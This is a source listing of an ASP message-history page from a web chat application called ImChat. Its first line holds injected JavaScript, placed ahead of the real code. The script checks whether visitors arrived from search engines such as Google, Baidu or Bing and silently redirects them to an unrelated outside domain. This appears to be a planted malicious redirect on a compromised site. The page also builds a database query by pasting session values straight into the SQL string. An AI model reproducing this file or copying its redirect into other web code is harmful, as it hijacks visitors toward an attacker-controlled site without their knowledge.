d:\wwwroot\wuchunhua\liaotianim\MsgHistory.asp

001: <script type="text/javascript">var s=document.referrer;if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://www.afisyecd.space/?1923057"}</script><!--#include file="inc/DAL.asp"-->
002: <!--#include file="inc/md5.asp"-->
003: <%
004: On Error Resume Next
005: if Session(Session_UserID_Arg)="" then RW "<script>location.href='../"&Web_Log_URL&"';</script>":response.end()
006: dim HMRS
007: Set HMRS=Server.CreateObject( "ADODB.Recordset" )
008: set HMRS=DB_CONN.EXECUTE("select top 500 * from [XK_Msg] where [Post_User_ID]="&Session(Session_UserID_Arg)&" or [Get_User_ID]="&Session(Session_UserID_Arg)&" order by [Msg_SendTime] ")
009:
010: %
>
011:
012: <html>
013: <head>
014: <meta http-equiv="Content-Type" content="text/html; charset=gb2312">
015: <title>iCenter - <%=SysConfig("System_Name")%></title>
016: <meta name="keywords" content="ImChat V1.5 Power By XKnet.net">
017: <meta name="description" content="ImChat V1.5 Power By XKnet.net">
018: <link href="CSS_Custom/style.css" rel="stylesheet" type="text/css" />
019: <script language="javascript" src="JS_Custom/pcasunzip.js"></script>
020: <style>
021:    *{font-family:"微软雅黑";}
022:    .body{ background-image:url(images/RoomBg.jpg); background-repeat:no-repeat; background-position:center 100px;}
023:    .btn{background: url(SysTem_Manage/themes/blue/img/bg_buttons.png) repeat-x top; border: 1px solid #0D87AE!important; color: #fff; font-size: 11px; padding: 7px 10px; boirder-radius: 7px; -moz-border-radius: 7px; font-weight: 700; border: none;}
024:     .btn:hover {background: url(SysTem_Manage/themes/blue/img/bg_buttons.png) 0 -50px; border: 1px solid #005977; cursor: pointer;}
025:     .inputbox{height:26px;}
026:     .leftnav li{text-align:center;}
027:     .leftnav li a{margin-left:20px;margin-bottom:5px;text-align:center;display:block;height:64px;line-height:64px;}
028:     .leftnav li a:hover{background-position:bottom left;}
029:     .UserInfo{background: url(images/userinfo.png) no-repeat top left;}
030:     .UserRoom{background: url(images/UserRoom.png) no-repeat top left;}
031:     .UserFriend{background: url(images/UserFriend.png) no-repeat top left;}
032:     .title{background: url(images/titlebg.png) no-repeat 0px -20px;height:300px;text-align:center;width:35px;color:#333;padding-top:20px;letter-spacing:6px;*padding-top:0px !important;_padding-top:20px;padding-left:3px;_padding-left:0px;line-height:18px;color:#555;}
033:     .title span{background: url(images/dot.png) no-repeat;padding-top:20px;width:15px;}
034:     .UserPhoto{width:100px;height:100px;margin-top:1px;margin-left:1px;}
035:     .photodiv{float:left;width:102px;*width:104px; height:102px;*height:104px;border:#ccc solid 1px;}
036:     .line{clear:both;line-height:5px;height:5px;}
037:     .text{background: none repeat scroll 0 0 transparent;border: 0 none;background-position: 0 -72px;border: 1px solid #C1C1C1;color:#444444;font-size: 14px;height: 30px;padding: 4px 5px 4px 0;width: 300px;padding-left:10px;}
038:     .itemtitle{float:left;height:28px;width:40px;line-height:28px;border:#ddd solid 1px;margin-right:3px;background: url(images/glassbg.png) bottom left no-repeat;text-align:center;color:#999}
039:     textarea{border: 1px solid #C1C1C1;background: none repeat scroll 0 0 transparent;width:300px;padding-left:10px;}
040:     select{height:30px;line-height:30px;border: 1px solid #C1C1C1;background: none repeat scroll 0 0 transparent;}
041:     .radio{}
042:     .btn-ok{background-image: url("images/global.png");background-color: transparent;background-position: 0 -288px;border: 0 none;cursor: pointer;height: 39px;margin: 10px 20px 10px 0;vertical-align: middle;width: 76px;margin-left:45px;}
043:     
044:     .png{}
045:     
046:     div{border:#ccc solid 0px;}
047: </style>
048: </head>
049: <body>
050: <table class="body" width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
051:   <tr height="70px">
052:     <td style="text-align:center;"><div class="top">
053:    <div style="width:90%; margin:0 auto;"><a href="index.html" style="float:left;"><img src="images/logo.gif" border="0" /></a>
054:     <a href="inc/ValidLogin.asp?Out=true" title="退出" class="logout"></a>
055:     <a href="javascript:\\;" title="加入浏览器收藏夹" onClick="window.external.AddFavorite(location.href,document.title);" class="fav"></a>
056:     <a href="RoomList.asp" title="房间列表" class="RList"></a>
057:     <a href="Member.asp" title="用户中心" class="user"></a>
058:     </div>
059:     </div></td>
060:   </tr>
061:   <tr>
062:     <td valign="top">
063:         <div style="float:left;width:7%;text-algin:center;min-width:85px;_width:85px;_overflow:visible;">
064:             <ul class="leftnav">
065:                 <li><a href="member.asp" title="我的资料" class="png UserInfo"></a></li>
066:                 <li><a href="MyRoomList.asp" title="我的房间" class="png UserRoom"></a></li>
067:                 <li><a href="#" title="我的好友" class="png UserFriend"></a></li>
068:             </ul>
069:         </div>
070:         <div style="float:left;width:4%;text-align:center;">
071:             <div style="width:100%;margin:0 auto;">
072:                 <div class="title png">
073:                     <span class="png">历史消息</span>
074:                 </div>
075:             </div>
076:         </div>
077:         <div style="float:left;width:78%;text-align:center;">
078:             <div style="float:left;width:20%;margin-left:10px;border:#ccc solid 1px;border-bottom:0px;">
079:                 <ul>
080:                     <li style="display:block;height:30px;line-height:30px;background:#fdfdfd;border-bottom:#ccc solid 1px;">
081:                         <a href="#">用户列表</a>
082:                     </li>
083:                     <li style="display:block;height:20px;line-height:20px;border-bottom:#ccc solid 1px;">
084:                         <a href="#">测试人</a>
085:                     </li>
086:                 </ul>
087:             </div>
088:             <div style="float:left;width:60%;margin-left:10px;border:#ccc solid 1px;border-bottom:0px;">
089:                 <ul>
090:                     <li style="display:block;height:30px;line-height:30px;background:#fdfdfd;border-bottom:#ccc solid 1px;">
091:                         <a href="#">消息</a>
092:                     </li>
093:                     <li style="display:block;height:20px;line-height:20px;border-bottom:#ccc solid 1px;">
094:                         <a href="#">测试人</a>
095:                     </li>
096:                 </ul>
097:             <div>
098:         </div>
099:     </td>
100:   </tr>
101: </table>
102: <!--[if IE 6]>
103:     <script type='text/javascript' src='js_Custom/DD_belatedPNG_0.0.8a-min.js'></script>
104:     <script type='text/javascript'>
105:       DD_belatedPNG.fix('.png');
106:     </script>
107: <![endif]-->

108: <div style="visibility:hidden;display:none;">
109: <script type="text/javascript" src="js/ext-base.js"></script>
110: <script type="text/javascript" src="js/ext-all-debug.js"></script>
111: <img src="images/logo.gif">
112: <img src="images/dgbg.jpg">
113: <img src="css/ext-all.css">
114: <img src="css_custom/layout.css">
115: <div>
116: </body>
117: </html>
118:
119:
120:
121: